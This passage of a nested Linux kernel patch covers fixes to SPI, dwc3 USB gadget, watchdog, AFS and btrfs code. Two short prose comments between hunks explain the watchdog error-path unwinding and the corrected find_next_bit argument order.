++			(SPI_BPW_RANGE_MASK(4, 8) | SPI_BPW_MASK(16) | SPI_BPW_MASK(32));
++	else
++		master->bits_per_word_mask =
++			(SPI_BPW_RANGE_MASK(4, 16) | SPI_BPW_MASK(32));
++
++	master->bits_per_word_mask &=
+ 		SPI_BPW_RANGE_MASK(1, mpc8xxx_spi->max_bits_per_word);
+ 
+ 	if (mpc8xxx_spi->flags & SPI_QE_CPU_MODE)
+diff --git a/drivers/usb/dwc3/gadget.c b/drivers/usb/dwc3/gadget.c
+index 3faac3244c7db..e63700937ba8c 100644
+--- a/drivers/usb/dwc3/gadget.c
++++ b/drivers/usb/dwc3/gadget.c
+@@ -2478,7 +2478,7 @@ static void __dwc3_gadget_set_speed(struct dwc3 *dwc)
+ 	dwc3_writel(dwc->regs, DWC3_DCFG, reg);
+ }
+ 
+-static int dwc3_gadget_run_stop(struct dwc3 *dwc, int is_on, int suspend)
++static int dwc3_gadget_run_stop(struct dwc3 *dwc, int is_on)
+ {
+ 	u32			reg;
+ 	u32			timeout = 2000;
+@@ -2497,17 +2497,11 @@ static int dwc3_gadget_run_stop(struct dwc3 *dwc, int is_on, int suspend)
+ 			reg &= ~DWC3_DCTL_KEEP_CONNECT;
+ 		reg |= DWC3_DCTL_RUN_STOP;
+ 
+-		if (dwc->has_hibernation)
+-			reg |= DWC3_DCTL_KEEP_CONNECT;
+-
+ 		__dwc3_gadget_set_speed(dwc);
+ 		dwc->pullups_connected = true;
+ 	} else {
+ 		reg &= ~DWC3_DCTL_RUN_STOP;
+ 
+-		if (dwc->has_hibernation && !suspend)
+-			reg &= ~DWC3_DCTL_KEEP_CONNECT;
+-
+ 		dwc->pullups_connected = false;
+ 	}
+ 
+@@ -2552,7 +2546,6 @@ static int dwc3_gadget_soft_disconnect(struct dwc3 *dwc)
+ 	 * bit.
+ 	 */
+ 	dwc3_stop_active_transfers(dwc);
+-	__dwc3_gadget_stop(dwc);
+ 	spin_unlock_irqrestore(&dwc->lock, flags);
+ 
+ 	/*
+@@ -2589,7 +2582,19 @@ static int dwc3_gadget_soft_disconnect(struct dwc3 *dwc)
+ 	 * remaining event generated by the controller while polling for
+ 	 * DSTS.DEVCTLHLT.
+ 	 */
+-	return dwc3_gadget_run_stop(dwc, false, false);
++	ret = dwc3_gadget_run_stop(dwc, false);
++
++	/*
++	 * Stop the gadget after the controller is halted, so that, if needed, the
++	 * events to update EP0 state can still occur while the run/stop
++	 * routine polls for the halted state.  DEVTEN is cleared as part of
++	 * gadget stop.
++	 */
++	spin_lock_irqsave(&dwc->lock, flags);
++	__dwc3_gadget_stop(dwc);
++	spin_unlock_irqrestore(&dwc->lock, flags);
++
++	return ret;
+ }
+ 
+ static int dwc3_gadget_pullup(struct usb_gadget *g, int is_on)
+@@ -2643,7 +2648,7 @@ static int dwc3_gadget_pullup(struct usb_gadget *g, int is_on)
+ 
+ 		dwc3_event_buffers_setup(dwc);
+ 		__dwc3_gadget_start(dwc);
+-		ret = dwc3_gadget_run_stop(dwc, true, false);
++		ret = dwc3_gadget_run_stop(dwc, true);
+ 	}
+ 
+ 	pm_runtime_put(dwc->dev);
+@@ -4210,30 +4215,6 @@ static void dwc3_gadget_suspend_interrupt(struct dwc3 *dwc,
+ 	dwc->link_state = next;
+ }
+ 
+-static void dwc3_gadget_hibernation_interrupt(struct dwc3 *dwc,
+-		unsigned int evtinfo)
+-{
+-	unsigned int is_ss = evtinfo & BIT(4);
+-
+-	/*
+-	 * WORKAROUND: DWC3 revision 2.20a with hibernation support
+-	 * have a known issue which can cause USB CV TD.9.23 to fail
+-	 * randomly.
+-	 *
+-	 * Because of this issue, core could generate bogus hibernation
+-	 * events which SW needs to ignore.
+-	 *
+-	 * Refers to:
+-	 *
+-	 * STAR#9000546576: Device Mode Hibernation: Issue in USB 2.0
+-	 * Device Fallback from SuperSpeed
+-	 */
+-	if (is_ss ^ (dwc->speed == USB_SPEED_SUPER))
+-		return;
+-
+-	/* enter hibernation here */
+-}
+-
+ static void dwc3_gadget_interrupt(struct dwc3 *dwc,
+ 		const struct dwc3_event_devt *event)
+ {
+@@ -4251,11 +4232,7 @@ static void dwc3_gadget_interrupt(struct dwc3 *dwc,
+ 		dwc3_gadget_wakeup_interrupt(dwc);
+ 		break;
+ 	case DWC3_DEVICE_EVENT_HIBER_REQ:
+-		if (dev_WARN_ONCE(dwc->dev, !dwc->has_hibernation,
+-					"unexpected hibernation event\n"))
+-			break;
+-
+-		dwc3_gadget_hibernation_interrupt(dwc, event->event_info);
++		dev_WARN_ONCE(dwc->dev, true, "unexpected hibernation event\n");
+ 		break;
+ 	case DWC3_DEVICE_EVENT_LINK_STATUS_CHANGE:
+ 		dwc3_gadget_linksts_change_interrupt(dwc, event->event_info);
+@@ -4592,7 +4569,7 @@ int dwc3_gadget_suspend(struct dwc3 *dwc)
+ 	if (!dwc->gadget_driver)
+ 		return 0;
+ 
+-	dwc3_gadget_run_stop(dwc, false, false);
++	dwc3_gadget_run_stop(dwc, false);
+ 
+ 	spin_lock_irqsave(&dwc->lock, flags);
+ 	dwc3_disconnect_gadget(dwc);
+@@ -4613,7 +4590,7 @@ int dwc3_gadget_resume(struct dwc3 *dwc)
+ 	if (ret < 0)
+ 		goto err0;
+ 
+-	ret = dwc3_gadget_run_stop(dwc, true, false);
++	ret = dwc3_gadget_run_stop(dwc, true);
+ 	if (ret < 0)
+ 		goto err1;
+ 
+diff --git a/drivers/watchdog/dw_wdt.c b/drivers/watchdog/dw_wdt.c
+index 52962e8d11a6f..61af5d1332ac6 100644
+--- a/drivers/watchdog/dw_wdt.c
++++ b/drivers/watchdog/dw_wdt.c
+@@ -635,7 +635,7 @@ static int dw_wdt_drv_probe(struct platform_device *pdev)
+ 
+ 	ret = dw_wdt_init_timeouts(dw_wdt, dev);
+ 	if (ret)
+-		goto out_disable_clk;
++		goto out_assert_rst;
+ 
+ 	wdd = &dw_wdt->wdd;
+ 	wdd->ops = &dw_wdt_ops;
+@@ -666,12 +666,15 @@ static int dw_wdt_drv_probe(struct platform_device *pdev)
+ 
+ 	ret = watchdog_register_device(wdd);
+ 	if (ret)
+-		goto out_disable_pclk;
++		goto out_assert_rst;
+ 
+ 	dw_wdt_dbgfs_init(dw_wdt);
+ 
+ 	return 0;
+ 
++out_assert_rst:
++	reset_control_assert(dw_wdt->rst);
++
+ out_disable_pclk:
+ 	clk_disable_unprepare(dw_wdt->pclk);
+ 
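The watchdog fix restores error-path symmetry: once the reset line has been deasserted during probe, every later failure must re-assert it before the clocks are released, so the new out_assert_rst label sits above out_disable_pclk and falls through it, undoing resources in reverse order of acquisition. The resulting unwind ladder, condensed (labels as in the driver; intermediate probe steps elided):

	ret = watchdog_register_device(wdd);
	if (ret)
		goto out_assert_rst;
	return 0;

out_assert_rst:
	reset_control_assert(dw_wdt->rst);
out_disable_pclk:
	clk_disable_unprepare(dw_wdt->pclk);
out_disable_clk:	/* failures before the reset deassert land here */
	clk_disable_unprepare(dw_wdt->clk);
	return ret;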
+diff --git a/fs/afs/afs.h b/fs/afs/afs.h
+index 432cb4b239614..81815724db6c9 100644
+--- a/fs/afs/afs.h
++++ b/fs/afs/afs.h
+@@ -19,8 +19,8 @@
+ #define AFSPATHMAX		1024	/* Maximum length of a pathname plus NUL */
+ #define AFSOPAQUEMAX		1024	/* Maximum length of an opaque field */
+ 
+-#define AFS_VL_MAX_LIFESPAN	(120 * HZ)
+-#define AFS_PROBE_MAX_LIFESPAN	(30 * HZ)
++#define AFS_VL_MAX_LIFESPAN	120
++#define AFS_PROBE_MAX_LIFESPAN	30
+ 
+ typedef u64			afs_volid_t;
+ typedef u64			afs_vnodeid_t;
+diff --git a/fs/afs/internal.h b/fs/afs/internal.h
+index fd8567b98e2bb..cd23a3c5b6ace 100644
+--- a/fs/afs/internal.h
++++ b/fs/afs/internal.h
+@@ -127,7 +127,7 @@ struct afs_call {
+ 	spinlock_t		state_lock;
+ 	int			error;		/* error code */
+ 	u32			abort_code;	/* Remote abort ID or 0 */
+-	unsigned int		max_lifespan;	/* Maximum lifespan to set if not 0 */
++	unsigned int		max_lifespan;	/* Maximum lifespan in secs to set if not 0 */
+ 	unsigned		request_size;	/* size of request data */
+ 	unsigned		reply_max;	/* maximum size of reply */
+ 	unsigned		count2;		/* count used in unmarshalling */
+diff --git a/fs/afs/rxrpc.c b/fs/afs/rxrpc.c
+index 7817e2b860e5e..6862e3dde364b 100644
+--- a/fs/afs/rxrpc.c
++++ b/fs/afs/rxrpc.c
+@@ -334,7 +334,9 @@ void afs_make_call(struct afs_addr_cursor *ac, struct afs_call *call, gfp_t gfp)
+ 	/* create a call */
+ 	rxcall = rxrpc_kernel_begin_call(call->net->socket, srx, call->key,
+ 					 (unsigned long)call,
+-					 tx_total_len, gfp,
++					 tx_total_len,
++					 call->max_lifespan,
++					 gfp,
+ 					 (call->async ?
+ 					  afs_wake_up_async_call :
+ 					  afs_wake_up_call_waiter),
+@@ -349,10 +351,6 @@ void afs_make_call(struct afs_addr_cursor *ac, struct afs_call *call, gfp_t gfp)
+ 	}
+ 
+ 	call->rxcall = rxcall;
+-
+-	if (call->max_lifespan)
+-		rxrpc_kernel_set_max_life(call->net->socket, rxcall,
+-					  call->max_lifespan);
+ 	call->issue_time = ktime_get_real();
+ 
+ 	/* send the request */
+diff --git a/fs/btrfs/backref.c b/fs/btrfs/backref.c
+index 0d7ae20e39c9a..ab4bad7dfa6e9 100644
+--- a/fs/btrfs/backref.c
++++ b/fs/btrfs/backref.c
+@@ -45,7 +45,8 @@ static int check_extent_in_eb(struct btrfs_backref_walk_ctx *ctx,
+ 	int root_count;
+ 	bool cached;
+ 
+-	if (!btrfs_file_extent_compression(eb, fi) &&
++	if (!ctx->ignore_extent_item_pos &&
++	    !btrfs_file_extent_compression(eb, fi) &&
+ 	    !btrfs_file_extent_encryption(eb, fi) &&
+ 	    !btrfs_file_extent_other_encoding(eb, fi)) {
+ 		u64 data_offset;
+@@ -552,7 +553,7 @@ static int add_all_parents(struct btrfs_backref_walk_ctx *ctx,
+ 				count++;
+ 			else
+ 				goto next;
+-			if (!ctx->ignore_extent_item_pos) {
++			if (!ctx->skip_inode_ref_list) {
+ 				ret = check_extent_in_eb(ctx, &key, eb, fi, &eie);
+ 				if (ret == BTRFS_ITERATE_EXTENT_INODES_STOP ||
+ 				    ret < 0)
+@@ -564,7 +565,7 @@ static int add_all_parents(struct btrfs_backref_walk_ctx *ctx,
+ 						  eie, (void **)&old, GFP_NOFS);
+ 			if (ret < 0)
+ 				break;
+-			if (!ret && !ctx->ignore_extent_item_pos) {
++			if (!ret && !ctx->skip_inode_ref_list) {
+ 				while (old->next)
+ 					old = old->next;
+ 				old->next = eie;
+@@ -1598,7 +1599,7 @@ again:
+ 				goto out;
+ 		}
+ 		if (ref->count && ref->parent) {
+-			if (!ctx->ignore_extent_item_pos && !ref->inode_list &&
++			if (!ctx->skip_inode_ref_list && !ref->inode_list &&
+ 			    ref->level == 0) {
+ 				struct btrfs_tree_parent_check check = { 0 };
+ 				struct extent_buffer *eb;
+@@ -1639,7 +1640,7 @@ again:
+ 						  (void **)&eie, GFP_NOFS);
+ 			if (ret < 0)
+ 				goto out;
+-			if (!ret && !ctx->ignore_extent_item_pos) {
++			if (!ret && !ctx->skip_inode_ref_list) {
+ 				/*
+ 				 * We've recorded that parent, so we must extend
+ 				 * its inode list here.
+@@ -1735,7 +1736,7 @@ int btrfs_find_all_leafs(struct btrfs_backref_walk_ctx *ctx)
+ static int btrfs_find_all_roots_safe(struct btrfs_backref_walk_ctx *ctx)
+ {
+ 	const u64 orig_bytenr = ctx->bytenr;
+-	const bool orig_ignore_extent_item_pos = ctx->ignore_extent_item_pos;
++	const bool orig_skip_inode_ref_list = ctx->skip_inode_ref_list;
+ 	bool roots_ulist_allocated = false;
+ 	struct ulist_iterator uiter;
+ 	int ret = 0;
+@@ -1756,7 +1757,7 @@ static int btrfs_find_all_roots_safe(struct btrfs_backref_walk_ctx *ctx)
+ 		roots_ulist_allocated = true;
+ 	}
+ 
+-	ctx->ignore_extent_item_pos = true;
++	ctx->skip_inode_ref_list = true;
+ 
+ 	ULIST_ITER_INIT(&uiter);
+ 	while (1) {
+@@ -1781,7 +1782,7 @@ static int btrfs_find_all_roots_safe(struct btrfs_backref_walk_ctx *ctx)
+ 	ulist_free(ctx->refs);
+ 	ctx->refs = NULL;
+ 	ctx->bytenr = orig_bytenr;
+-	ctx->ignore_extent_item_pos = orig_ignore_extent_item_pos;
++	ctx->skip_inode_ref_list = orig_skip_inode_ref_list;
+ 
+ 	return ret;
+ }
+@@ -1885,7 +1886,7 @@ int btrfs_is_data_extent_shared(struct btrfs_inode *inode, u64 bytenr,
+ 		walk_ctx.time_seq = elem.seq;
+ 	}
+ 
+-	walk_ctx.ignore_extent_item_pos = true;
++	walk_ctx.skip_inode_ref_list = true;
+ 	walk_ctx.trans = trans;
+ 	walk_ctx.fs_info = fs_info;
+ 	walk_ctx.refs = &ctx->refs;
+diff --git a/fs/btrfs/backref.h b/fs/btrfs/backref.h
+index ef6bbea3f4562..1616e3e3f1e41 100644
+--- a/fs/btrfs/backref.h
++++ b/fs/btrfs/backref.h
+@@ -60,6 +60,12 @@ struct btrfs_backref_walk_ctx {
+ 	 * @extent_item_pos is ignored.
+ 	 */
+ 	bool ignore_extent_item_pos;
++	/*
++	 * If true and bytenr corresponds to a data extent, then the inode list
++	 * (each member describing inode number, file offset and root) is not
++	 * added to each reference added to the @refs ulist.
++	 */
++	bool skip_inode_ref_list;
+ 	/* A valid transaction handle or NULL. */
+ 	struct btrfs_trans_handle *trans;
+ 	/*
+diff --git a/fs/btrfs/block-rsv.c b/fs/btrfs/block-rsv.c
+index 5367a14d44d2a..4bb4a48758723 100644
+--- a/fs/btrfs/block-rsv.c
++++ b/fs/btrfs/block-rsv.c
+@@ -124,7 +124,8 @@ static u64 block_rsv_release_bytes(struct btrfs_fs_info *fs_info,
+ 	} else {
+ 		num_bytes = 0;
+ 	}
+-	if (block_rsv->qgroup_rsv_reserved >= block_rsv->qgroup_rsv_size) {
++	if (qgroup_to_release_ret &&
++	    block_rsv->qgroup_rsv_reserved >= block_rsv->qgroup_rsv_size) {
+ 		qgroup_to_release = block_rsv->qgroup_rsv_reserved -
+ 				    block_rsv->qgroup_rsv_size;
+ 		block_rsv->qgroup_rsv_reserved = block_rsv->qgroup_rsv_size;
+diff --git a/fs/btrfs/ctree.c b/fs/btrfs/ctree.c
+index 4754c9101a4c1..306cc735180fa 100644
+--- a/fs/btrfs/ctree.c
++++ b/fs/btrfs/ctree.c
+@@ -4493,10 +4493,12 @@ int btrfs_del_items(struct btrfs_trans_handle *trans, struct btrfs_root *root,
+ int btrfs_prev_leaf(struct btrfs_root *root, struct btrfs_path *path)
+ {
+ 	struct btrfs_key key;
++	struct btrfs_key orig_key;
+ 	struct btrfs_disk_key found_key;
+ 	int ret;
+ 
+ 	btrfs_item_key_to_cpu(path->nodes[0], &key, 0);
++	orig_key = key;
+ 
+ 	if (key.offset > 0) {
+ 		key.offset--;
+@@ -4513,8 +4515,36 @@ int btrfs_prev_leaf(struct btrfs_root *root, struct btrfs_path *path)
+ 
+ 	btrfs_release_path(path);
+ 	ret = btrfs_search_slot(NULL, root, &key, path, 0, 0);
+-	if (ret < 0)
++	if (ret <= 0)
+ 		return ret;
++
++	/*
++	 * Previous key not found. Even if we were at slot 0 of the leaf we had
++	 * before releasing the path and calling btrfs_search_slot(), we now may
++	 * be in a slot pointing to the same original key - this can happen if
++	 * after we released the path, one or more items were moved from a
++	 * sibling leaf into the front of the leaf we had due to an insertion
++	 * (see push_leaf_right()).
++	 * If we hit this case and our slot is > 0, just decrement the slot
++	 * so that the caller does not process the same key again, which may or
++	 * may not break the caller, depending on its logic.
++	 */
++	if (path->slots[0] < btrfs_header_nritems(path->nodes[0])) {
++		btrfs_item_key(path->nodes[0], &found_key, path->slots[0]);
++		ret = comp_keys(&found_key, &orig_key);
++		if (ret == 0) {
++			if (path->slots[0] > 0) {
++				path->slots[0]--;
++				return 0;
++			}
++			/*
++			 * At slot 0, same key as before, it means orig_key is
++			 * the lowest, leftmost key in the tree. We're done.
++			 */
++			return 1;
++		}
++	}
++
+ 	btrfs_item_key(path->nodes[0], &found_key, 0);
+ 	ret = comp_keys(&found_key, &key);
+ 	/*
+diff --git a/fs/btrfs/disk-io.c b/fs/btrfs/disk-io.c
+index 174d196d69609..fc1f3a91d8827 100644
+--- a/fs/btrfs/disk-io.c
++++ b/fs/btrfs/disk-io.c
+@@ -3306,23 +3306,34 @@ int btrfs_start_pre_rw_mount(struct btrfs_fs_info *fs_info)
+ {
+ 	int ret;
+ 	const bool cache_opt = btrfs_test_opt(fs_info, SPACE_CACHE);
+-	bool clear_free_space_tree = false;
++	bool rebuild_free_space_tree = false;
+ 
+ 	if (btrfs_test_opt(fs_info, CLEAR_CACHE) &&
+ 	    btrfs_fs_compat_ro(fs_info, FREE_SPACE_TREE)) {
+-		clear_free_space_tree = true;
++		rebuild_free_space_tree = true;
+ 	} else if (btrfs_fs_compat_ro(fs_info, FREE_SPACE_TREE) &&
+ 		   !btrfs_fs_compat_ro(fs_info, FREE_SPACE_TREE_VALID)) {
+ 		btrfs_warn(fs_info, "free space tree is invalid");
+-		clear_free_space_tree = true;
++		rebuild_free_space_tree = true;
+ 	}
+ 
+-	if (clear_free_space_tree) {
+-		btrfs_info(fs_info, "clearing free space tree");
+-		ret = btrfs_clear_free_space_tree(fs_info);
++	if (rebuild_free_space_tree) {
++		btrfs_info(fs_info, "rebuilding free space tree");
++		ret = btrfs_rebuild_free_space_tree(fs_info);
+ 		if (ret) {
+ 			btrfs_warn(fs_info,
+-				   "failed to clear free space tree: %d", ret);
++				   "failed to rebuild free space tree: %d", ret);
++			goto out;
++		}
++	}
++
++	if (btrfs_fs_compat_ro(fs_info, FREE_SPACE_TREE) &&
++	    !btrfs_test_opt(fs_info, FREE_SPACE_TREE)) {
++		btrfs_info(fs_info, "disabling free space tree");
++		ret = btrfs_delete_free_space_tree(fs_info);
++		if (ret) {
++			btrfs_warn(fs_info,
++				   "failed to disable free space tree: %d", ret);
+ 			goto out;
+ 		}
+ 	}
+diff --git a/fs/btrfs/file-item.c b/fs/btrfs/file-item.c
+index 5de73466b2ca2..d4d88ee04bf9e 100644
+--- a/fs/btrfs/file-item.c
++++ b/fs/btrfs/file-item.c
+@@ -52,13 +52,13 @@ void btrfs_inode_safe_disk_i_size_write(struct btrfs_inode *inode, u64 new_i_siz
+ 	u64 start, end, i_size;
+ 	int ret;
+ 
++	spin_lock(&inode->lock);
+ 	i_size = new_i_size ?: i_size_read(&inode->vfs_inode);
+ 	if (btrfs_fs_incompat(fs_info, NO_HOLES)) {
+ 		inode->disk_i_size = i_size;
+-		return;
++		goto out_unlock;
+ 	}
+ 
+-	spin_lock(&inode->lock);
+ 	ret = find_contiguous_extent_bit(&inode->file_extent_tree, 0, &start,
+ 					 &end, EXTENT_DIRTY);
+ 	if (!ret && start == 0)
+@@ -66,6 +66,7 @@ void btrfs_inode_safe_disk_i_size_write(struct btrfs_inode *inode, u64 new_i_siz
+ 	else
+ 		i_size = 0;
+ 	inode->disk_i_size = i_size;
++out_unlock:
+ 	spin_unlock(&inode->lock);
+ }
+ 
+diff --git a/fs/btrfs/free-space-cache.c b/fs/btrfs/free-space-cache.c
+index d84cef89cdff5..cf98a3c054802 100644
+--- a/fs/btrfs/free-space-cache.c
++++ b/fs/btrfs/free-space-cache.c
+@@ -870,15 +870,16 @@ static int __load_free_space_cache(struct btrfs_root *root, struct inode *inode,
+ 			}
+ 			spin_lock(&ctl->tree_lock);
+ 			ret = link_free_space(ctl, e);
+-			ctl->total_bitmaps++;
+-			recalculate_thresholds(ctl);
+-			spin_unlock(&ctl->tree_lock);
+ 			if (ret) {
++				spin_unlock(&ctl->tree_lock);
+ 				btrfs_err(fs_info,
+ 					"Duplicate entries in free space cache, dumping");
+ 				kmem_cache_free(btrfs_free_space_cachep, e);
+ 				goto free_cache;
+ 			}
++			ctl->total_bitmaps++;
++			recalculate_thresholds(ctl);
++			spin_unlock(&ctl->tree_lock);
+ 			list_add_tail(&e->list, &bitmaps);
+ 		}
+ 
+diff --git a/fs/btrfs/free-space-tree.c b/fs/btrfs/free-space-tree.c
+index c667e878ef1a6..3b623dce33793 100644
+--- a/fs/btrfs/free-space-tree.c
++++ b/fs/btrfs/free-space-tree.c
+@@ -1252,7 +1252,7 @@ out:
+ 	return ret;
+ }
+ 
+-int btrfs_clear_free_space_tree(struct btrfs_fs_info *fs_info)
++int btrfs_delete_free_space_tree(struct btrfs_fs_info *fs_info)
+ {
+ 	struct btrfs_trans_handle *trans;
+ 	struct btrfs_root *tree_root = fs_info->tree_root;
+@@ -1298,6 +1298,54 @@ abort:
+ 	return ret;
+ }
+ 
++int btrfs_rebuild_free_space_tree(struct btrfs_fs_info *fs_info)
++{
++	struct btrfs_trans_handle *trans;
++	struct btrfs_key key = {
++		.objectid = BTRFS_FREE_SPACE_TREE_OBJECTID,
++		.type = BTRFS_ROOT_ITEM_KEY,
++		.offset = 0,
++	};
++	struct btrfs_root *free_space_root = btrfs_global_root(fs_info, &key);
++	struct rb_node *node;
++	int ret;
++
++	trans = btrfs_start_transaction(free_space_root, 1);
++	if (IS_ERR(trans))
++		return PTR_ERR(trans);
++
++	set_bit(BTRFS_FS_CREATING_FREE_SPACE_TREE, &fs_info->flags);
++	set_bit(BTRFS_FS_FREE_SPACE_TREE_UNTRUSTED, &fs_info->flags);
++
++	ret = clear_free_space_tree(trans, free_space_root);
++	if (ret)
++		goto abort;
++
++	node = rb_first_cached(&fs_info->block_group_cache_tree);
++	while (node) {
++		struct btrfs_block_group *block_group;
++
++		block_group = rb_entry(node, struct btrfs_block_group,
++				       cache_node);
++		ret = populate_free_space_tree(trans, block_group);
++		if (ret)
++			goto abort;
++		node = rb_next(node);
++	}
++
++	btrfs_set_fs_compat_ro(fs_info, FREE_SPACE_TREE);
++	btrfs_set_fs_compat_ro(fs_info, FREE_SPACE_TREE_VALID);
++	clear_bit(BTRFS_FS_CREATING_FREE_SPACE_TREE, &fs_info->flags);
++
++	ret = btrfs_commit_transaction(trans);
++	clear_bit(BTRFS_FS_FREE_SPACE_TREE_UNTRUSTED, &fs_info->flags);
++	return ret;
++abort:
++	btrfs_abort_transaction(trans, ret);
++	btrfs_end_transaction(trans);
++	return ret;
++}
++
+ static int __add_block_group_free_space(struct btrfs_trans_handle *trans,
+ 					struct btrfs_block_group *block_group,
+ 					struct btrfs_path *path)
+diff --git a/fs/btrfs/free-space-tree.h b/fs/btrfs/free-space-tree.h
+index dc2463e4cfe3c..6d5551d0ced81 100644
+--- a/fs/btrfs/free-space-tree.h
++++ b/fs/btrfs/free-space-tree.h
+@@ -18,7 +18,8 @@ struct btrfs_caching_control;
+ 
+ void set_free_space_tree_thresholds(struct btrfs_block_group *block_group);
+ int btrfs_create_free_space_tree(struct btrfs_fs_info *fs_info);
+-int btrfs_clear_free_space_tree(struct btrfs_fs_info *fs_info);
++int btrfs_delete_free_space_tree(struct btrfs_fs_info *fs_info);
++int btrfs_rebuild_free_space_tree(struct btrfs_fs_info *fs_info);
+ int load_free_space_tree(struct btrfs_caching_control *caching_ctl);
+ int add_block_group_free_space(struct btrfs_trans_handle *trans,
+ 			       struct btrfs_block_group *block_group);
+diff --git a/fs/btrfs/inode.c b/fs/btrfs/inode.c
+index 98a800b8bd438..21ed4e3dd6902 100644
+--- a/fs/btrfs/inode.c
++++ b/fs/btrfs/inode.c
+@@ -3264,6 +3264,9 @@ int btrfs_finish_ordered_io(struct btrfs_ordered_extent *ordered_extent)
+ 		btrfs_rewrite_logical_zoned(ordered_extent);
+ 		btrfs_zone_finish_endio(fs_info, ordered_extent->disk_bytenr,
+ 					ordered_extent->disk_num_bytes);
++	} else if (btrfs_is_data_reloc_root(inode->root)) {
++		btrfs_zone_finish_endio(fs_info, ordered_extent->disk_bytenr,
++					ordered_extent->disk_num_bytes);
+ 	}
+ 
+ 	btrfs_free_io_failure_record(inode, start, end);
+diff --git a/fs/btrfs/ioctl.c b/fs/btrfs/ioctl.c
+index bff2d1fd3c812..8a045166a2654 100644
+--- a/fs/btrfs/ioctl.c
++++ b/fs/btrfs/ioctl.c
+@@ -454,7 +454,9 @@ void btrfs_exclop_balance(struct btrfs_fs_info *fs_info,
+ 	case BTRFS_EXCLOP_BALANCE_PAUSED:
+ 		spin_lock(&fs_info->super_lock);
+ 		ASSERT(fs_info->exclusive_operation == BTRFS_EXCLOP_BALANCE ||
+-		       fs_info->exclusive_operation == BTRFS_EXCLOP_DEV_ADD);
++		       fs_info->exclusive_operation == BTRFS_EXCLOP_DEV_ADD ||
++		       fs_info->exclusive_operation == BTRFS_EXCLOP_NONE ||
++		       fs_info->exclusive_operation == BTRFS_EXCLOP_BALANCE_PAUSED);
+ 		fs_info->exclusive_operation = BTRFS_EXCLOP_BALANCE_PAUSED;
+ 		spin_unlock(&fs_info->super_lock);
+ 		break;
+diff --git a/fs/btrfs/print-tree.c b/fs/btrfs/print-tree.c
+index b93c962133048..497b9dbd8a133 100644
+--- a/fs/btrfs/print-tree.c
++++ b/fs/btrfs/print-tree.c
+@@ -151,10 +151,10 @@ static void print_extent_item(struct extent_buffer *eb, int slot, int type)
+ 			pr_cont("shared data backref parent %llu count %u\n",
+ 			       offset, btrfs_shared_data_ref_count(eb, sref));
+ 			/*
+-			 * offset is supposed to be a tree block which
+-			 * must be aligned to nodesize.
++			 * Offset is supposed to be a tree block which must be
++			 * aligned to sectorsize.
+ 			 */
+-			if (!IS_ALIGNED(offset, eb->fs_info->nodesize))
++			if (!IS_ALIGNED(offset, eb->fs_info->sectorsize))
+ 				pr_info(
+ 			"\t\t\t(parent %llu not aligned to sectorsize %u)\n",
+ 				     offset, eb->fs_info->sectorsize);
+diff --git a/fs/btrfs/relocation.c b/fs/btrfs/relocation.c
+index 31ec4a7658ce6..4f96a4825795e 100644
+--- a/fs/btrfs/relocation.c
++++ b/fs/btrfs/relocation.c
+@@ -3422,7 +3422,7 @@ int add_data_references(struct reloc_control *rc,
+ 	btrfs_release_path(path);
+ 
+ 	ctx.bytenr = extent_key->objectid;
+-	ctx.ignore_extent_item_pos = true;
++	ctx.skip_inode_ref_list = true;
+ 	ctx.fs_info = rc->extent_root->fs_info;
+ 
+ 	ret = btrfs_find_all_leafs(&ctx);
+diff --git a/fs/btrfs/super.c b/fs/btrfs/super.c
+index 3f3c8f9186f90..21322be95c0d2 100644
+--- a/fs/btrfs/super.c
++++ b/fs/btrfs/super.c
+@@ -825,7 +825,11 @@ out:
+ 	    !btrfs_test_opt(info, CLEAR_CACHE)) {
+ 		btrfs_err(info, "cannot disable free space tree");
+ 		ret = -EINVAL;
+-
++	}
++	if (btrfs_fs_compat_ro(info, BLOCK_GROUP_TREE) &&
++	     !btrfs_test_opt(info, FREE_SPACE_TREE)) {
++		btrfs_err(info, "cannot disable free space tree with block-group-tree feature");
++		ret = -EINVAL;
+ 	}
+ 	if (!ret)
+ 		ret = btrfs_check_mountopts_zoned(info);
+diff --git a/fs/btrfs/zoned.c b/fs/btrfs/zoned.c
+index ce5ebba7fdd9a..250c4755ec12d 100644
+--- a/fs/btrfs/zoned.c
++++ b/fs/btrfs/zoned.c
+@@ -121,10 +121,9 @@ static int sb_write_pointer(struct block_device *bdev, struct blk_zone *zones,
+ 		int i;
+ 
+ 		for (i = 0; i < BTRFS_NR_SB_LOG_ZONES; i++) {
+-			u64 bytenr;
+-
+-			bytenr = ((zones[i].start + zones[i].len)
+-				   << SECTOR_SHIFT) - BTRFS_SUPER_INFO_SIZE;
++			u64 zone_end = (zones[i].start + zones[i].capacity) << SECTOR_SHIFT;
++			u64 bytenr = ALIGN_DOWN(zone_end, BTRFS_SUPER_INFO_SIZE) -
++						BTRFS_SUPER_INFO_SIZE;
+ 
+ 			page[i] = read_cache_page_gfp(mapping,
+ 					bytenr >> PAGE_SHIFT, GFP_NOFS);
+@@ -1164,12 +1163,12 @@ int btrfs_ensure_empty_zones(struct btrfs_device *device, u64 start, u64 size)
+ 		return -ERANGE;
+ 
+ 	/* All the zones are conventional */
+-	if (find_next_bit(zinfo->seq_zones, begin, end) == end)
++	if (find_next_bit(zinfo->seq_zones, end, begin) == end)
+ 		return 0;
+ 
+ 	/* All the zones are sequential and empty */
+-	if (find_next_zero_bit(zinfo->seq_zones, begin, end) == end &&
+-	    find_next_zero_bit(zinfo->empty_zones, begin, end) == end)
++	if (find_next_zero_bit(zinfo->seq_zones, end, begin) == end &&
++	    find_next_zero_bit(zinfo->empty_zones, end, begin) == end)
+ 		return 0;
+ 
+ 	for (pos = start; pos < start + size; pos += zinfo->zone_size) {
+@@ -1606,11 +1605,11 @@ void btrfs_redirty_list_add(struct btrfs_transaction *trans,
+ 	    !list_empty(&eb->release_list))
+ 		return;
+ 
++	memzero_extent_buffer(eb, 0, eb->len);
++	set_bit(EXTENT_BUFFER_NO_CHECK, &eb->bflags);
+ 	set_extent_buffer_dirty(eb);
+ 	set_extent_bits_nowait(&trans->dirty_pages, eb->start,
+ 			       eb->start + eb->len - 1, EXTENT_DIRTY);
+-	memzero_extent_buffer(eb, 0, eb->len);
+-	set_bit(EXTENT_BUFFER_NO_CHECK, &eb->bflags);
+ 
+ 	spin_lock(&trans->releasing_ebs_lock);
+ 	list_add_tail(&eb->release_list, &trans->releasing_ebs);
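The btrfs_ensure_empty_zones() hunk is a pure argument-order correction: the bitmap search helpers take the bitmap length second and the start offset third, so the old calls searched a bitmap of length 'begin' starting at offset 'end'. For reference, the signatures being matched (from <linux/find.h>):

unsigned long find_next_bit(const unsigned long *addr,
			    unsigned long size, unsigned long offset);
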